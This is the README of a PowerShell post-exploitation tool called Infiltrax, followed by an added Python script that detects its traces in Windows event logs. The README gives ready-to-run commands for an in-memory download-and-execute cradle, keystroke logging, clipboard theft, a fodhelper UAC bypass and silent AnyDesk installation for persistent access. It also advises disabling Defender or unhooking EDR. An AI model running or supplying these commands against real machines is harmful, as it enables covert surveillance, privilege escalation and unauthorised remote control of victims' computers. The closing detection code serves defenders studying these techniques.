Infiltrax: UAC Bypass, Keylogging, and Persistent Access for Penetration Testers

Infiltrax

Infiltrax is a post-exploitation reconnaissance tool for penetration testers and red teams, designed to capture screenshots, retrieve clipboard contents, log keystrokes, bypass UAC and install AnyDesk for persistent remote access.

Features

  • Screenshot Capture: Take screenshots of the entire screen and save them as PNG files.
  • Clipboard Retrieval: Access the current clipboard contents.
  • Keystroke Logging: Record keystrokes for a specified duration.
  • UAC Bypass: Bypass UAC via fodhelper.exe.
  • AnyDesk Installation: Install and configure AnyDesk with unattended access.

Use

  1. Load the script directly into memory

C:\Users\Administrator\Desktop> IEX(New-Object Net.WebClient).downloadString("https://raw.githubusercontent.com/alexdhital/Infiltrax/main/Infiltrax.ps1")

  2. Get the clipboard contents

C:\Users\Administrator\Desktop> Invoke-Clipboard

  3. Take a desktop screenshot and save it to a given location

C:\Users\Administrator\Desktop> Invoke-Screenshot -Path C:\Windows\Tasks\

  4. Capture user keystrokes and save them to a file

C:\Users\Administrator\Desktop> Invoke-KeyStrokeCapture -DurationInSeconds 30 -OutputPath C:\Users\Vlex\Desktop\keystrokes.txt

  5. Bypass UAC to run any program in an elevated context. The default program is powershell.exe.

    This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692; all credit goes to netbiosX :). Spawning cmd.exe or powershell.exe from the script gets caught by behavioural detection; disable Defender or unhook EDR first.

C:\Users\Vlex\Desktop> Invoke-FodHelperBypass -program calc.exe

  6. Install AnyDesk silently, set up unattended access and get the remote ID (requires administrative privileges)

C:\Users\Administrator\Desktop> Invoke-AnyDeskInstall -InstallPath C:\Users\Alex\AppData\Local\AnyDesk -Password Unattended123!
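
For defenders, the behaviours listed above leave telemetry in PowerShell script block logging (event 4104) and Sysmon events 1 and 13. The Python below is an added example, not part of Infiltrax or its README: the event dicts are constructed samples, the `classify`/`scan` names and finding labels are assumptions, and the `ms-settings` registry path comes from public documentation of the fodhelper technique rather than from this page.

```python
import re

# Function names as listed on this page.
FUNCS = re.compile(r"\bInvoke-(Clipboard|Screenshot|KeyStrokeCapture|FodHelperBypass|AnyDeskInstall)\b", re.I)
# In-memory load pattern shown in step 1: IEX combined with DownloadString.
CRADLE = re.compile(r"(\bIEX\b|Invoke-Expression).*DownloadString\s*\(", re.I | re.S)
# Per-user ms-settings handler key abused by the fodhelper technique (ATT&CK T1548.002).
# Sysmon may report the HKCU classes hive as ...\Software\Classes or as <SID>_Classes.
FOD_KEY = re.compile(r"(\\Software\\Classes|_Classes)\\ms-settings\\shell\\open\\command", re.I)

def classify(ev):
    """Return finding labels for one event dict (Sysmon / PowerShell log field names)."""
    eid, hits = ev.get("EventID"), []
    if eid == 4104:  # PowerShell script block logging
        text = ev.get("ScriptBlockText", "")
        if FUNCS.search(text):
            hits.append("infiltrax-function")
        if CRADLE.search(text):
            hits.append("download-cradle")
    elif eid == 13:  # Sysmon: registry value set
        if FOD_KEY.search(ev.get("TargetObject", "")):
            hits.append("fodhelper-registry-hijack")
    elif eid == 1:  # Sysmon: process creation
        image = ev.get("Image", "").lower()
        if ev.get("ParentImage", "").lower().endswith("\\fodhelper.exe"):
            hits.append("fodhelper-child-process")
        if image.endswith("\\anydesk.exe") and "\\appdata\\" in image:
            hits.append("anydesk-in-user-profile")
    return hits

def scan(events):
    """Return {index: labels} for every event that produced at least one finding."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

# Constructed sample events (not captured from a real host).
SAMPLE = [
    {"EventID": 4104, "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://example.invalid/x.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "Invoke-KeyStrokeCapture -DurationInSeconds 30"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1-2-3-1001_Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\fodhelper.exe", "Image": r"C:\Windows\System32\calc.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Users\Alex\AppData\Local\AnyDesk\AnyDesk.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"},
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE).items():
        print(idx, labels)
```

The function-name match only catches unmodified copies of the script; the registry and parent-process checks do not depend on the script's naming.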